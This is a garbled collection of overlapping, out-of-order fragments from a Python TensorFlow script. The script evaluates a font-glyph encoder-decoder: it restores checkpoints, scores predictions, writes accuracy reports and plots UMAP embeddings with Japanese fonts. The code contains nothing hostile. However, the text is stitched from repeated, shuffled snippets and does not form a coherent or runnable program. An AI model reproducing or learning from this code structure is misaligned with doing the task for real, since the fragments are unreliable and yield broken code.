txt.write('Failed =", "pred['pred_id2'][i][predid2])) else: txt.write('predict: id %d = %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1]", "for i in range(pred['target_id1'].shape[0]): txt.write('---\\n') target = pred['target_id'][i].numpy() txt.write('target: id", "self.manager = tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2) if 
not last is", "rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] = ['Hiragino Maru Gothic Pro',", "+ 1) acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1)) print('acc', acc)", "'sans-serif' rcParams['font.sans-serif'] = ['Hiragino Maru Gothic Pro', 'Yu Gothic', 'Meirio',", "%d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif predid > self.data.id_count", "from matplotlib import rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] = ['Hiragino", "tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager = tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2) if not", "Sans CJK JP'] import net class SimpleEncodeDecoder: def __init__(self): self.save_dir", "in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return acc", "import tensorflow as tf physical_devices = tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True)", "epoch): result = [] labels = [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as", "%s\\n'%(target, self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i]) predid =", "'target_id1': target_id1, 'target_id2': target_id2, } def make_plot(self, test_ds, epoch): result", "target_id1 = inputs['idx1'] target_id2 = inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'], -1)", "if not last is None: self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded %d", "inputs): input_data = { 'image': inputs['input'], } feature = self.encoder(input_data)", "+ failed_count) txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy", "txt.write('target: id %d = %s\\n'%(target, self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i]) predid2", "predid1 = np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i]) predid = predid1 *", "tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock() self.encoder.summary() self.decoder = net.SimpleDecoderBlock() self.decoder.summary() inputs", "pbar: for inputs in test_ds: pred = self.eval_substep(inputs) result +=", "pred_id2 = tf.nn.softmax(outputs['id2'], -1) return { 'feature': feature, 'pred_id1': pred_id1,", "SimpleEncodeDecoder: def __init__(self): self.save_dir = './result/step1/' self.result_dir = './result/plot/' os.makedirs(self.result_dir,", "self.batch_size = 64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer =", "checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager =", "print('loaded %d epoch'%self.init_epoch) else: self.init_epoch = 0 self.model.summary() def eval(self):", "cannot modify virtual devices once initialized. 
pass import numpy as", "txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc)", "%f\\n'%acc) result = np.concatenate(result) labels = np.concatenate(labels) print('run UMAP') X_reduced", "failed_count) txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy =", "import signal import net from matplotlib import rcParams rcParams['font.family'] =", "'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK JP'] import net class", "= np.concatenate(labels) print('run UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig, ax =", "np.concatenate(labels) print('run UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig, ax = plt.subplots(figsize=(50,", "np.concatenate(result) labels = np.concatenate(labels) print('run UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig,", "'pred_id2': pred_id2, 'target_id': target_id, 'target_id1': target_id1, 'target_id2': target_id2, } def", "txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif predid", "-1) pred_id2 = tf.nn.softmax(outputs['id2'], -1) return { 'feature': feature, 'pred_id1':", "import rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] = ['Hiragino Maru Gothic", "X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig, ax = plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0],", "0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP') for i, label", "pred_id1 = tf.nn.softmax(outputs['id1'], -1) pred_id2 = tf.nn.softmax(outputs['id2'], -1) return {", "target_id1, 'target_id2': target_id2, } def make_plot(self, test_ds, epoch): result =", "@tf.function def eval_substep(self, inputs): input_data = { 'image': inputs['input'], }", "tf physical_devices = tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except: # Invalid", "self.init_epoch + 1) acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1)) print('acc',", "initialized. 
pass import numpy as np import os, time, csv", "predid == 0: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] *", "except: # Invalid device or cannot modify virtual devices once", "umap.UMAP(metric='cosine').fit_transform(result) fig, ax = plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0], X_reduced[:, 1],", "correct_count = 0 failed_count = 0 with tqdm.tqdm(total=len(self.data.test_keys)) as pbar:", "test_ds: pred = self.eval_substep(inputs) result += [pred['feature']] labels += [pred['target_id']]", "signal import net from matplotlib import rcParams rcParams['font.family'] = 'sans-serif'", "'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK JP']", "1], c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP') for i, label in enumerate(labels):", "outputs = self.decoder(feature) target_id = inputs['index'] target_id1 = inputs['idx1'] target_id2", "return acc def eval(): encoder = SimpleEncodeDecoder() encoder.eval() if __name__", "self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if target == predid: txt.write('Correct!\\n') correct_count", "self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock() self.encoder.summary() self.decoder = net.SimpleDecoderBlock()", "'./result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir = self.save_dir self.max_epoch = 300 self.steps_per_epoch", "import umap import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import", "id %d = %s\\n'%(target, self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i]) predid2 =", "= np.argmax(pred['pred_id2'][i]) predid = predid1 * 100 + predid2 if", "directory=checkpoint_dir, max_to_keep=2) if not last is None: self.init_epoch = int(os.path.basename(last).split('-')[1])", "1000 self.batch_size = 64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer", "= tf.nn.softmax(outputs['id1'], -1) pred_id2 = tf.nn.softmax(outputs['id2'], -1) return { 'feature':", "txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else: txt.write('predict:", "= plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv')) print('plot", "devices once initialized. pass import numpy as np import os,", "failed_count = 0 with tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for inputs in", "X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP') for i, label in", "or cannot modify virtual devices once initialized. 
pass import numpy", "os, time, csv import tqdm import umap import matplotlib matplotlib.use('Agg')", "with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count = 0 failed_count = 0", "outputs, name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last)", "+= [pred['feature']] labels += [pred['target_id']] for i in range(pred['target_id1'].shape[0]): txt.write('---\\n')", "import datetime import signal import net from matplotlib import rcParams", "'Noto Sans CJK JP'] import net class SimpleEncodeDecoder: def __init__(self):", "\", self.init_epoch + 1) acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1))", "# Invalid device or cannot modify virtual devices once initialized.", "target == predid: txt.write('Correct!\\n') correct_count += 1 else: txt.write('Failed!\\n') failed_count", "open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count = 0 failed_count = 0 with", "__init__(self): self.save_dir = './result/step1/' self.result_dir = './result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir", "(X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return acc def eval(): encoder", "'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK JP'] import net", "lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder =", "checkpoint.restore(last) self.manager = tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2) if not last", "acc def eval(): encoder = SimpleEncodeDecoder() encoder.eval() if __name__ ==", "self.model.summary() def eval(self): self.data = net.FontData() print(\"Plot: \", self.init_epoch +", "* pred['pred_id2'][i][predid2])) else: txt.write('predict: id %d = %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1],", "= %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if target ==", "X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return acc def eval(): encoder =", "= 300 self.steps_per_epoch = 1000 self.batch_size = 64 lr =", "modify virtual devices once initialized. 
pass import numpy as np", "elif predid > self.data.id_count + 1: txt.write('predict: id %d nothing", "(p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else: txt.write('predict: id %d = %s", "tensorflow as tf physical_devices = tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except:", "self.encoder.summary() self.decoder = net.SimpleDecoderBlock() self.decoder.summary() inputs = { 'image': tf.keras.Input(shape=(128,128,3)),", "= self.save_dir self.max_epoch = 300 self.steps_per_epoch = 1000 self.batch_size =", "(p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if target == predid: txt.write('Correct!\\n')", "tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager = tf.train.CheckpointManager( checkpoint,", "range(pred['target_id1'].shape[0]): txt.write('---\\n') target = pred['target_id'][i].numpy() txt.write('target: id %d = %s\\n'%(target,", "dpi=300) plt.close('all') return acc def eval(): encoder = SimpleEncodeDecoder() encoder.eval()", "pred['pred_id2'][i][predid2])) if target == predid: txt.write('Correct!\\n') correct_count += 1 else:", "predid2 = np.argmax(pred['pred_id2'][i]) predid = predid1 * 100 + predid2", "predid2 if predid == 0: txt.write('predict: id %d nothing (p=%f)\\n'%(predid,", "%d epoch'%self.init_epoch) else: self.init_epoch = 0 self.model.summary() def eval(self): self.data", "+ 1: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2]))", "100 + predid2 if predid == 0: txt.write('predict: id %d", "= inputs['idx1'] target_id2 = inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'], -1) pred_id2", "0 failed_count = 0 with tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for inputs", "%d = %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if target", "tqdm import umap import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt", "inputs = { 'image': tf.keras.Input(shape=(128,128,3)), } feature_out = self.encoder(inputs) outputs", "'feature': feature, 'pred_id1': pred_id1, 'pred_id2': pred_id2, 'target_id': target_id, 'target_id1': target_id1,", "%d = %s\\n'%(target, self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i])", "'target_id2': target_id2, } def make_plot(self, test_ds, epoch): result = []", "None: self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch) else: self.init_epoch =", "= tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock() self.encoder.summary() self.decoder = net.SimpleDecoderBlock() self.decoder.summary()", "%s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if target == predid:", "last is None: self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch) else:", "self.init_epoch = 0 self.model.summary() def eval(self): self.data = net.FontData() print(\"Plot:", "== predid: txt.write('Correct!\\n') correct_count += 1 else: txt.write('Failed!\\n') failed_count +=", "self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch) else: self.init_epoch = 0", "tf.nn.softmax(outputs['id1'], -1) pred_id2 = 
tf.nn.softmax(outputs['id2'], -1) return { 'feature': feature,", "outputs = self.decoder(feature_out) self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint =", "def eval(): encoder = SimpleEncodeDecoder() encoder.eval() if __name__ == '__main__':", "self.encoder(input_data) outputs = self.decoder(feature) target_id = inputs['index'] target_id1 = inputs['idx1']", "= self.decoder(feature_out) self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer,", "for i, label in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300)", "+= 1 else: txt.write('Failed!\\n') failed_count += 1 pbar.update(1) acc =", "txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc) result = np.concatenate(result) labels", "plt import datetime import signal import net from matplotlib import", "nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif predid > self.data.id_count +", "feature = self.encoder(input_data) outputs = self.decoder(feature) target_id = inputs['index'] target_id1", "Invalid device or cannot modify virtual devices once initialized. pass", "device or cannot modify virtual devices once initialized. pass import", "[] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count = 0 failed_count =", "self.steps_per_epoch = 1000 self.batch_size = 64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5,", "+ 1)) print('acc', acc) @tf.function def eval_substep(self, inputs): input_data =", "predid = predid1 * 100 + predid2 if predid ==", "> self.data.id_count + 1: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1]", "+= [pred['target_id']] for i in range(pred['target_id1'].shape[0]): txt.write('---\\n') target = pred['target_id'][i].numpy()", "rcParams['font.sans-serif'] = ['Hiragino Maru Gothic Pro', 'Yu Gothic', 'Meirio', 'Takao',", "= umap.UMAP(metric='cosine').fit_transform(result) fig, ax = plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0], X_reduced[:,", "* pred['pred_id2'][i][predid2])) if target == predid: txt.write('Correct!\\n') correct_count += 1", "else: txt.write('Failed!\\n') failed_count += 1 pbar.update(1) acc = correct_count /", "target_id = inputs['index'] target_id1 = inputs['idx1'] target_id2 = inputs['idx2'] pred_id1", "= %s\\n'%(target, self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i]) predid", "nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else: txt.write('predict: id %d =", "= 'sans-serif' rcParams['font.sans-serif'] = ['Hiragino Maru Gothic Pro', 'Yu Gothic',", "1: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else:", "64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder", "= correct_count / (correct_count + failed_count) txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count)", "UMAP') for i, label in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch),", "['Hiragino Maru Gothic Pro', 'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic',", "= 
tf.nn.softmax(outputs['id2'], -1) return { 'feature': feature, 'pred_id1': pred_id1, 'pred_id2':", "== 0: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2]))", "= net.FeatureBlock() self.encoder.summary() self.decoder = net.SimpleDecoderBlock() self.decoder.summary() inputs = {", "np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i]) predid = predid1 * 100 +", "result = np.concatenate(result) labels = np.concatenate(labels) print('run UMAP') X_reduced =", "'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK JP'] import net class SimpleEncodeDecoder:", "} feature_out = self.encoder(inputs) outputs = self.decoder(feature_out) self.model = tf.keras.Model(inputs,", "enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return acc def", "inputs['index'] target_id1 = inputs['idx1'] target_id2 = inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'],", "if predid == 0: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1]", "= ['Hiragino Maru Gothic Pro', 'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic',", "tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2) if not last is None: self.init_epoch", "matplotlib.use('Agg') import matplotlib.pyplot as plt import datetime import signal import", "pred = self.eval_substep(inputs) result += [pred['feature']] labels += [pred['target_id']] for", "int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch) else: self.init_epoch = 0 self.model.summary() def", "tf.nn.softmax(outputs['id2'], -1) return { 'feature': feature, 'pred_id1': pred_id1, 'pred_id2': pred_id2,", "plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return acc def eval(): encoder = SimpleEncodeDecoder()", "import net class SimpleEncodeDecoder: def __init__(self): self.save_dir = './result/step1/' self.result_dir", "0: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif", "tf.keras.Input(shape=(128,128,3)), } feature_out = self.encoder(inputs) outputs = self.decoder(feature_out) self.model =", "if target == predid: txt.write('Correct!\\n') correct_count += 1 else: txt.write('Failed!\\n')", "labels += [pred['target_id']] for i in range(pred['target_id1'].shape[0]): txt.write('---\\n') target =", "* pred['pred_id2'][i][predid2])) elif predid > self.data.id_count + 1: txt.write('predict: id", "import os, time, csv import tqdm import umap import matplotlib", "max_to_keep=2) if not last is None: self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded", "self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1)) print('acc', acc) @tf.function def eval_substep(self, inputs):", "as np import os, time, csv import tqdm import umap", "txt.write('Failed!\\n') failed_count += 1 pbar.update(1) acc = correct_count / (correct_count", "umap import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import datetime", "tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for inputs in test_ds: pred = self.eval_substep(inputs)", "time, csv import tqdm import umap import matplotlib matplotlib.use('Agg') import", "plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP')", "self.encoder(inputs) outputs = 
self.decoder(feature_out) self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint", "rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] = ['Hiragino Maru Gothic Pro', 'Yu", "tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock() self.encoder.summary()", "= tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager = tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2) if", "= './result/step1/' self.result_dir = './result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir = self.save_dir", "txt.write('Correct!\\n') correct_count += 1 else: txt.write('Failed!\\n') failed_count += 1 pbar.update(1)", "= tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2) if not last is None:", "label in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return", "0 with tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for inputs in test_ds: pred", "pred_id1, 'pred_id2': pred_id2, 'target_id': target_id, 'target_id1': target_id1, 'target_id2': target_id2, }", "predid: txt.write('Correct!\\n') correct_count += 1 else: txt.write('Failed!\\n') failed_count += 1", "True) except: # Invalid device or cannot modify virtual devices", "self.encoder = net.FeatureBlock() self.encoder.summary() self.decoder = net.SimpleDecoderBlock() self.decoder.summary() inputs =", "txt: correct_count = 0 failed_count = 0 with tqdm.tqdm(total=len(self.data.test_keys)) as", "try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except: # Invalid device or cannot modify", "self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last", "self.max_epoch = 300 self.steps_per_epoch = 1000 self.batch_size = 64 lr", "= self.eval_substep(inputs) result += [pred['feature']] labels += [pred['target_id']] for i", "= inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'], -1) pred_id2 = tf.nn.softmax(outputs['id2'], -1)", "50)) ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP') for", "self.save_dir self.max_epoch = 300 self.steps_per_epoch = 1000 self.batch_size = 64", "input_data = { 'image': inputs['input'], } feature = self.encoder(input_data) outputs", "inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'], -1) pred_id2 = tf.nn.softmax(outputs['id2'], -1) return", "matplotlib.pyplot as plt import datetime import signal import net from", "txt.write('Correct = %d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc) result", "print('plot UMAP') for i, label in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1]))", "tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except: # Invalid device or cannot", "Pro', 'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK", "acc) @tf.function def eval_substep(self, inputs): input_data = { 'image': inputs['input'],", "cmap=plt.get_cmap('hsv')) print('plot UMAP') for i, label in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0],", "JP'] import net class SimpleEncodeDecoder: def __init__(self): self.save_dir = 
'./result/step1/'", "+ predid2 if predid == 0: txt.write('predict: id %d nothing", "%d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc) result = np.concatenate(result)", "matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import datetime import signal", "= 0 with tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for inputs in test_ds:", "self.result_dir = './result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir = self.save_dir self.max_epoch =", "datetime import signal import net from matplotlib import rcParams rcParams['font.family']", "self.decoder(feature_out) self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model)", "fig, ax = plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels,", "import matplotlib.pyplot as plt import datetime import signal import net", "physical_devices = tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except: # Invalid device", "%d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc) result = np.concatenate(result) labels = np.concatenate(labels)", "'pred_id1': pred_id1, 'pred_id2': pred_id2, 'target_id': target_id, 'target_id1': target_id1, 'target_id2': target_id2,", "result = [] labels = [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt:", "[pred['feature']] labels += [pred['target_id']] for i in range(pred['target_id1'].shape[0]): txt.write('---\\n') target", "txt.write('---\\n') target = pred['target_id'][i].numpy() txt.write('target: id %d = %s\\n'%(target, self.data.glyphs[target-1]))", "Gothic Pro', 'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans", "{ 'feature': feature, 'pred_id1': pred_id1, 'pred_id2': pred_id2, 'target_id': target_id, 'target_id1':", "with tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for inputs in test_ds: pred =", "= np.concatenate(result) labels = np.concatenate(labels) print('run UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result)", "= predid1 * 100 + predid2 if predid == 0:", "np import os, time, csv import tqdm import umap import", "1 pbar.update(1) acc = correct_count / (correct_count + failed_count) txt.write('==============\\n')", "i, label in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all')", "[pred['target_id']] for i in range(pred['target_id1'].shape[0]): txt.write('---\\n') target = pred['target_id'][i].numpy() txt.write('target:", "epoch'%self.init_epoch) else: self.init_epoch = 0 self.model.summary() def eval(self): self.data =", "def make_plot(self, test_ds, epoch): result = [] labels = []", "-1) return { 'feature': feature, 'pred_id1': pred_id1, 'pred_id2': pred_id2, 'target_id':", "predid1 * 100 + predid2 if predid == 0: txt.write('predict:", "= %f\\n'%acc) result = np.concatenate(result) labels = np.concatenate(labels) print('run UMAP')", "not last is None: self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch)", "= tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock()", "+= 1 pbar.update(1) acc = correct_count / (correct_count + failed_count)", "%d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * 
pred['pred_id2'][i][predid2])) else: txt.write('predict: id %d", "= net.FontData() print(\"Plot: \", self.init_epoch + 1) acc = self.make_plot(self.data.test_data(self.batch_size),", "target_id2 = inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'], -1) pred_id2 = tf.nn.softmax(outputs['id2'],", "eval_substep(self, inputs): input_data = { 'image': inputs['input'], } feature =", "for inputs in test_ds: pred = self.eval_substep(inputs) result += [pred['feature']]", "ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP') for i,", "matplotlib import rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] = ['Hiragino Maru", "300 self.steps_per_epoch = 1000 self.batch_size = 64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3,", "self.save_dir = './result/step1/' self.result_dir = './result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir =", "feature, 'pred_id1': pred_id1, 'pred_id2': pred_id2, 'target_id': target_id, 'target_id1': target_id1, 'target_id2':", "np.argmax(pred['pred_id2'][i]) predid = predid1 * 100 + predid2 if predid", "net from matplotlib import rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] =", "target_id2, } def make_plot(self, test_ds, epoch): result = [] labels", "= net.SimpleDecoderBlock() self.decoder.summary() inputs = { 'image': tf.keras.Input(shape=(128,128,3)), } feature_out", "self.data = net.FontData() print(\"Plot: \", self.init_epoch + 1) acc =", "checkpoint_dir = self.save_dir self.max_epoch = 300 self.steps_per_epoch = 1000 self.batch_size", "self.decoder = net.SimpleDecoderBlock() self.decoder.summary() inputs = { 'image': tf.keras.Input(shape=(128,128,3)), }", "import numpy as np import os, time, csv import tqdm", "* 100 + predid2 if predid == 0: txt.write('predict: id", "= %d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc) result =", "c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP') for i, label in enumerate(labels): ax.annotate(self.data.glyphs[label-1],", "{ 'image': tf.keras.Input(shape=(128,128,3)), } feature_out = self.encoder(inputs) outputs = self.decoder(feature_out)", "predid > self.data.id_count + 1: 